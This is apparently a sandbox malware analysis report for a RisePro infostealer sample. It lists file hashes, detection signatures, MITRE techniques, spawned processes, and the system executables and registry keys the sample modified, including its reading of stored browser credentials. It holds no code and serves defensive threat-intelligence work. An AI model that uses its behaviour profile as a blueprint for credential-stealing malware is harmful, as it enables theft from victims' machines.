risepro | 5f7353e35fbc4c21f022693339c1d9f695472ae28460464fbe2892ff8221eb88

Analysis

max time kernel
150s
max time network
154s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
23/06/2024, 16:31 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
Size

4.3MB
MD5

79527ada2268a9f517373d4ce0465bfd
SHA1

52f00b743ef8ebca2214f1025e92dfee9881dd4c
SHA256

5f7353e35fbc4c21f022693339c1d9f695472ae28460464fbe2892ff8221eb88
SHA512

a9d42b0fe48dbfbc13e1cc714e9a5757ef48b22d549ab3bb1dd87262b3556c1310c6d7ffd5e6c9bdf74288e98d2a542bca9b7b376f81ba5d35b858d50017b6de
SSDEEP

49152:zaRGf+GDHxuC1vKjxa1CPsFRuX35gZKUxT21HHF6c9OtutTjI/uj1tObh95O:zaAXHxuC1SjE17FRCgDx21iOUv4

Score

10^/10

risepro discovery spyware stealer

Malware Config

Signatures

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro

Executes dropped EXE 64 IoCs

pid	Process
460	Process not Found
2580	alg.exe
2640	aspnet_state.exe
2600	mscorsvw.exe
2348	mscorsvw.exe
2808	mscorsvw.exe
2708	mscorsvw.exe
2188	ehRecvr.exe
1040	ehsched.exe
2936	elevation_service.exe
896	IEEtwCollector.exe
1612	GROOVE.EXE
908	maintenanceservice.exe
3008	msdtc.exe
3028	msiexec.exe
2260	OSE.EXE
2504	OSPPSVC.EXE
1500	perfhost.exe
1140	mscorsvw.exe
928	locator.exe
1888	mscorsvw.exe
1580	snmptrap.exe
2992	vds.exe
3000	mscorsvw.exe
2404	vssvc.exe
2632	mscorsvw.exe
2876	mscorsvw.exe
2784	wbengine.exe
1364	WmiApSrv.exe
1368	mscorsvw.exe
868	wmpnetwk.exe
2432	mscorsvw.exe
1324	SearchIndexer.exe
3052	mscorsvw.exe
2872	mscorsvw.exe
1680	mscorsvw.exe
2272	mscorsvw.exe
2876	mscorsvw.exe
2072	mscorsvw.exe
1664	mscorsvw.exe
1728	mscorsvw.exe
1592	mscorsvw.exe
2104	mscorsvw.exe
1300	mscorsvw.exe
1704	mscorsvw.exe
1664	mscorsvw.exe
1444	mscorsvw.exe
1728	mscorsvw.exe
1576	mscorsvw.exe
768	mscorsvw.exe
2872	mscorsvw.exe
1520	mscorsvw.exe
2264	mscorsvw.exe
1492	mscorsvw.exe
2328	mscorsvw.exe
2464	mscorsvw.exe
2692	mscorsvw.exe
2140	mscorsvw.exe
2564	mscorsvw.exe
2752	mscorsvw.exe
308	mscorsvw.exe
324	mscorsvw.exe
2868	mscorsvw.exe
2692	mscorsvw.exe

Loads dropped DLL 55 IoCs

pid	Process
460	Process not Found
460	Process not Found
460	Process not Found
460	Process not Found
460	Process not Found
460	Process not Found
460	Process not Found
3028	msiexec.exe
460	Process not Found
460	Process not Found
460	Process not Found
460	Process not Found
460	Process not Found
748	Process not Found
2464	mscorsvw.exe
2464	mscorsvw.exe
2140	mscorsvw.exe
2140	mscorsvw.exe
2752	mscorsvw.exe
2752	mscorsvw.exe
324	mscorsvw.exe
324	mscorsvw.exe
2692	mscorsvw.exe
2692	mscorsvw.exe
2924	mscorsvw.exe
2924	mscorsvw.exe
1516	mscorsvw.exe
1516	mscorsvw.exe
3004	mscorsvw.exe
3004	mscorsvw.exe
2364	mscorsvw.exe
2364	mscorsvw.exe
460	Process not Found
2468	mscorsvw.exe
2468	mscorsvw.exe
2244	mscorsvw.exe
2244	mscorsvw.exe
2832	mscorsvw.exe
2832	mscorsvw.exe
1680	mscorsvw.exe
1680	mscorsvw.exe
2096	mscorsvw.exe
2096	mscorsvw.exe
2364	mscorsvw.exe
2364	mscorsvw.exe
2200	mscorsvw.exe
2200	mscorsvw.exe
2072	mscorsvw.exe
2072	mscorsvw.exe
1624	mscorsvw.exe
1624	mscorsvw.exe
1028	mscorsvw.exe
1028	mscorsvw.exe
2952	mscorsvw.exe
2952	mscorsvw.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 23 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\alg.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\System32\msdtc.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B2238AACCEDC3F1FFE8E7EB5F575EC9	mscorsvw.exe
File opened for modification	C:\Windows\system32\msiexec.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\SysWow64\perfhost.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\system32\wbengine.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\system32\dllhost.exe	alg.exe
File opened for modification	C:\Windows\system32\dllhost.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	GROOVE.EXE
File opened for modification	C:\Windows\system32\wbem\WmiApSrv.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	SearchProtocolHost.exe
File opened for modification	C:\Windows\system32\IEEtwCollector.exe	alg.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B2238AACCEDC3F1FFE8E7EB5F575EC9	mscorsvw.exe
File opened for modification	C:\Windows\system32\IEEtwCollector.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\system32\vssvc.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\System32\vds.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\system32\SearchIndexer.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	alg.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\921579358ab55808.bin	alg.exe
File opened for modification	C:\Windows\system32\locator.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\System32\snmptrap.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ieinstal.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javaw.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jre7\bin\policytool.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\rmiregistry.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jre7\bin\jabswitch.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jre7\bin\pack200.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Mozilla Firefox\crashreporter.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ssvagent.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jre7\bin\kinit.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateSetup.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdate.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jre7\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javaws.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	alg.exe
File opened for modification	C:\Program Files\DVD Maker\DVDMaker.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe	alg.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeUpdaterInstallMgr.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\iexplore.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jre7\bin\klist.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe	alg.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\ehome\ehRecvr.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP69DA.tmp\stdole.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index144.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index14b.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index14d.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP60B6.tmp\ehiVidCtl.dll	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngenservice_pri3_lock.dat	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\index150.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index154.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index14d.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index150.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\index14b.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index14a.dat	mscorsvw.exe
File opened for modification	C:\Windows\Registration\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{8259C7FB-0162-4424-A8F7-C1B4D1BCB13D}.crmlog	dllhost.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\index148.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP3775.tmp\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index150.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen_service.log	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\index144.dat	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index145.dat	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index155.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\index156.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngenservice_pri1_lock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index146.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index146.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP3BA9.tmp\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	alg.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\index153.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\index155.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index154.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index14e.dat	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index144.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP29EE.tmp\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index147.dat	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP313E.tmp\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\index14c.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index153.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP3459.tmp\Microsoft.Office.Tools.v9.0.dll	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\index14f.dat	mscorsvw.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-107 = "Lighthouse"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\System32\wshext.dll,-4802 = "VBScript Script File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\System32\syncCenter.dll,-3001 = "Sync files between your computer and network folders"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\msra.exe,-100 = "Windows Remote Assistance"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Program Files\Windows Sidebar\sidebar.exe,-1005 = "Desktop Gadget Gallery"	SearchProtocolHost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SBE\SAL\CacheWaitForSize = "32"	ehRec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@"%systemroot%\system32\windowspowershell\v1.0\powershell.exe",-111 = "Performs object-based (command-line) functions"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\unregmp2.exe,-4 = "Windows Media Player"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	mscorsvw.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	ehRecvr.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{993BE281-6695-4BA5-8A2A-7AACBFAAB69E} {0000013A-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000807ee1f78ac5da01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\wdc.dll,-10030 = "Resource Monitor"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%systemroot%\system32\dfrgui.exe,-172 = "Defragments your disks so that your computer runs faster and more efficiently."	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	mscorsvw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\ehome\ehdrop.dll,-152 = "Microsoft Recorded TV Show"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\SoundRecorder.exe,-32790 = "Record sound and save it on your computer."	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%windir%\system32\miguiresource.dll,-102 = "View monitoring and troubleshooting messages from windows and other programs."	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\gameux.dll,-10300 = "Play the classic strategy game of Checkers against online opponents. Be the first to capture all your opponent’s pieces, or leave them with no more moves, to win the game."	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	mscorsvw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%windir%\system32\FXSRESM.dll,-115 = "Send and receive faxes or scan pictures and documents."	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform	OSPPSVC.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-5 = "Microsoft Transliteration Engine"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-106 = "Tulips"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	mscorsvw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SBE	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	mscorsvw.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SBE\SAL\FileInlineGrowthQuantumSeconds = "30"	ehRec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	mscorsvw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\MCTRes.dll,-200016 = "USA.gov"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\System32\SnippingTool.exe,-15052 = "Capture a portion of your screen so you can save, annotate, or share the image."	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\gameux.dll,-10308 = "Mahjong Titans is a form of solitaire played with tiles instead of cards. Match pairs of tiles until all have been removed from the board in this classic game."	SearchProtocolHost.exe
